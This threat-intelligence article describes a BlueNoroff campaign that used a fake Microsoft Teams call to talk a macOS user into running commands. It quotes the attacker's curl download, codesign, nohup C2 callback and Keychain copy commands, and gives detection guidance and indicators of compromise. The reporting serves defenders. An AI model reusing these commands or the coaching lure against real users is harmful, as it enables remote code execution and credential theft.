BlueNoroff Weaponizes Microsoft Teams Calls to Steal macOS Credentials in Real-Time

BlueNoroff Weaponizes Microsoft Teams Calls to Steal macOS Credentials in Real-Time

Daylight Security has published findings from a real-world intrusion in which BlueNoroff — the financially motivated subgroup of North Korea's Lazarus Group — used live social engineering over Microsoft Teams to compromise a macOS endpoint, steal Keychain credentials, and stage data for exfiltration. The entire attack was operator-driven in real time, with no exploits or traditional malware delivery involved.

The activity aligns with the GhostCall campaign pattern previously attributed to BlueNoroff, in which victims are funneled from messaging platforms into meeting-based lures that enable live command execution and credential theft.

The Attack Chain

The intrusion began on Telegram. The attacker posed as a legitimate business prospect, built rapport, and escalated to a Microsoft Teams call using a lookalike domain — teams.microscall[.]com, registered January 15, 2026.

During the call, the attacker claimed to be experiencing audio issues and coached the victim into opening a terminal and running commands to "fix" the problem. Those commands were the attack.

Payload retrieval. The victim was instructed to download a binary via curl to a path designed to blend in with legitimate macOS system files:

curl -o /Library/Caches/com.apple.sys.receipt https://microsmeet[.]xyz/...

Defense evasion. The attacker walked the victim through making the file executable and ad-hoc signing it to reduce macOS execution friction:

chmod 777 /Library/Caches/com.apple.sys.receipt
codesign --force --deep --sign - /Library/Caches/com.apple.sys.receipt

Persistent execution. The binary was launched detached via nohup, with output suppressed:

nohup /Library/Caches/com.apple.sys.receipt http://bluyy[.]com/<id> >/dev/null 2>&1 &

Secondary components. A second payload masqueraded as an iCloud sync process, and a hidden file was unpacked from a zip archive in /tmp and executed with a C2 callback:

/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.sync 1 1 audio
/private/tmp/.aLTJwk supportzm[.]com:443

Credential theft. The attacker copied the victim's Keychain database directly:

cp -rf .../login.keychain-db /tmp/<staging_dir>

Data staging. AppleScript (osascript) sequences created directories and bundled stolen files for exfiltration to attacker-controlled infrastructure.

Why This Matters

Every tool used in this intrusion is native to macOS — curl, chmod, codesign, nohup, cp, osascript. There is no malware dropper, no exploit, no phishing link. The human is the delivery mechanism. Each individual action looks benign in isolation. It's the cluster that reveals the compromise.

This is the second distinct Lazarus social engineering campaign targeting developers disclosed today. Red Asgard's Contagious Interview investigation documented industrial-scale credential theft through fake coding interviews, affecting 857 developers across 90 countries. BlueNoroff's GhostCall campaign uses a different vector — live video calls instead of repository-based attacks — but the objective is identical: credentials, wallets, and persistent access.

Detection Guidance

The behavioral chain to alert on is curl writing to system-like cache paths, followed by chmod and ad-hoc codesign on the same file, followed by nohup execution from cache or tmp directories, followed by Keychain database access, followed by osascript-based file staging. Individually these are noise. Together they are compromise.

SOC teams should also monitor for Microsoft Teams connections to domains that are not teams.microsoft.com — particularly recently registered lookalike domains.

Indicators of Compromise

Domains:

bluyy[.]com (Created 2026-01-20)
teams.microscall[.]com (Created 2026-01-15)
microsmeet[.]xyz (Created 2025-11-07)
supportzm[.]com (Created 2025-06-30)

IP Addresses:

23.254.130[.]131 (Hostwinds AS54290)
23.254.204[.]184 (Hostwinds AS54290)

File Paths:

/Library/Caches/com.apple.sys.receipt
/Library/Caches/com.apple.sys.receipt.cstemp
/private/tmp/.057B0D85-071D-4A43-B4FF-7281027B9B32.zip
/private/tmp/.7fTGPB
/private/tmp/.aLTJwk
/private/tmp/com.apple.icloud.sync.app/Contents/MacOS/com.apple.icloud.sync

SHA256 Hashes:

ede7f3ece611ba6c1ac4a02cf6a618b4ebd7eec6d9426b2baab3b5e26246e275
b302be4f9c515eb68d3e8b1ad8388d45b788eca34e7d53726d05c310a8f66af7
18ec3c93e076e16447aee6fa390a44d3cb03e7f46e8466535ee76ed2041a88e5
75a82b9a2e7cfa0002fbbd1dbcb0bfaf5f6333169fd53507f7119593b9c4482e
de664ae9a35ec7f156962df168d876c01c0262fb91486fc25c27859aa9bfe206
e3ed631addd7242e8c1f6faa90087742ff5b442e734132d2fe2594d65659eafd

MITRE ATT&CK

T1566.003 — Phishing via Service Initial contact via Telegram, escalation to fake Teams call

T1204.002 — User Execution: Malicious File Victim coached into downloading and executing binary

T1036.005 — Masquerading: Match Legitimate Name or Location Payload written to /Library/Caches/com.apple.sys.receipt, secondary component disguised as com.apple.icloud.sync

T1553.002 — Subvert Trust Controls: Code Signing Ad-hoc codesign applied to malicious binary

T1555.001 — Credentials from Password Stores: Keychain Direct copy of login.keychain-db

T1059.002 — Command and Scripting Interpreter: AppleScript osascript used for data staging

T1071.001 — Application Layer Protocol: Web Protocols C2 communication over HTTP/HTTPS to attacker domains

Read more

ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT). The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls

By Zero Day Wire
ShinyHunters Linked to Device Code Vishing Attacks Targeting Microsoft Entra Accounts via OAuth 2.0 Abuse

ShinyHunters Linked to Device Code Vishing Attacks Targeting Microsoft Entra Accounts via OAuth 2.0 Abuse

A new wave of attacks is combining voice phishing (vishing) with OAuth 2.0 device authorization abuse to compromise Microsoft Entra accounts at technology, manufacturing, and financial organizations — bypassing traditional phishing infrastructure entirely. Sources told BleepingComputer they believe the ShinyHunters extortion gang is behind the campaigns, which the threat actors

By Zero Day Wire